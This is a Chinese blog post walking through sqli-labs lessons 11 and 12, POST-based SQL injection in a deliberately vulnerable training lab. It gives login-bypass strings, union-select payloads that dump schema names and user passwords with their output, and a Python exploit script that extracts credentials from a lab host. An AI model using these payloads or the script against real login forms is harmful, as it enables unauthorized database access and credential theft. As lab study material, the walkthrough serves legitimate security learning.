Sqli-labs 复习 Less11-12 基于错误的sql注入 - POST

版权声明:本文为博主原创连载文章,为了内容连贯性,未经博主允许不得转载。 https://blog.csdn.net/Kevinhanser/article/details/81592484

之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象

Sqli-labs 博客目录

基于错误的 sql 注入 #

函数讲解

group_concat()多条信息一次查询 

distinct去重

Less-11 报错型sql注入-单引号

  1. 测试

    在 username 中输入 admin’ or ‘1’=’1 #
    在 password 中输入任意内容

  2. 猜字段数

    1 ’ order by 2# // 登录失败,无显示
    1 ’ order by 3# // 登录失败,报错

  3. 猜数据库名

    1’union select 1,@@version#
    1’union select 1,(select database() limit 0,1)#
    1’union select 1,(select group_concat(distinct+table_schema,0x20) from information_schema.tables limit0,1)#

    结果为 information_schema ,challenges ,dvwa ,mysql ,owasp10 ,security ,tikiwiki ,tikiwiki195

  4. 猜表名

    1’union select 1,(select group_concat(distinct+table_name,0x20) from information_schema.tables where table_schema=’security’) #

    结果为 emails ,referers ,uagents ,users

  5. 猜列名

    1’ union select 1,(select group_concat(distinct+column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’)#

    结果为 id ,username ,password

  6. 猜数据

    1’ union select 1,group_concat(distinct+username) from security.users #
    1’ union select 1,group_concat(distinct+password) from security.users #

    结果为

    Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
    Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
    
  7. 运行脚本

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    
    import requests
    import hackhttp
    import re
    
    def verify(arg):
    
        print "verify start..."
        post = "uname=1%27%20union%20select%20md5(123),group_concat(password,0x20)%20from%20users%20 #&passwd=aaa&submit=Submit"
        # payload  必须使用 url 编码
    
        hh = hackhttp.hackhttp()
        code, head, body, redirect_url, log = hh.http(arg,post)
    
        if '202cb962ac59075b964b07152d234b70' in body:
            print "目标存在sql注入!"
    
    def exploit(arg):
    
        print "exploit start..."
        payload = ['username','password']
        username = "\nusername: "  
        for i in payload:
            if i == 'password':
                username += '\npassowrd: '
            post = "uname=1' union select 1,group_concat(distinct+{i}) from security.users #&passwd=aaa&submit=Submit".format(i=i)
            hh = hackhttp.hackhttp()
            code, head, body, redirect_url, log = hh.http(arg,post)
            user = re.findall("Your Password:(.*?)<br>",body)
            for c in user:
                username += c        
        print "目标管理员用户: {username}".format(username=username)
    
    if __name__ == '__main__':
            verify('http://10.10.10.130/sqli-labs/Less-11/?id=')
            exploit('http://10.10.10.130/sqli-labs/Less-11/?id=')
    

Less-12 报错型sql注入-双引号

  1. 测试

    在 username 中输入 admin”) or (“1”)=(“1 #
    在 password 中输入任意内容

  2. 猜字段数

    1”) order by 2# // 登录失败,无显示
    1”) order by 3# // 登录失败,报错

  3. 猜数据库名

    1”)union select 1,@@version#
    1”)union select 1,database()#
    1”)union select 1,(select group_concat(distinct+table_schema,0x20) from information_schema.tables)#

    结果为 information_schema ,challenges ,dvwa ,mysql ,owasp10 ,security ,tikiwiki ,tikiwiki195

  4. 猜表名

    1”)union select 1,(select group_concat(distinct+table_name,0x20) from information_schema.tables where table_schema=’security’) #

    结果为 emails ,referers ,uagents ,users

  5. 猜列名

    1”) union select 1,(select group_concat(distinct+column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’)#

    结果为 id ,username ,password

  6. 猜数据

    1”) union select 1,group_concat(distinct+username) from security.users #
    1”) union select 1,group_concat(distinct+password) from security.users #

    结果为

    Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
    Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
    
阅读更多

没有更多推荐了,返回首页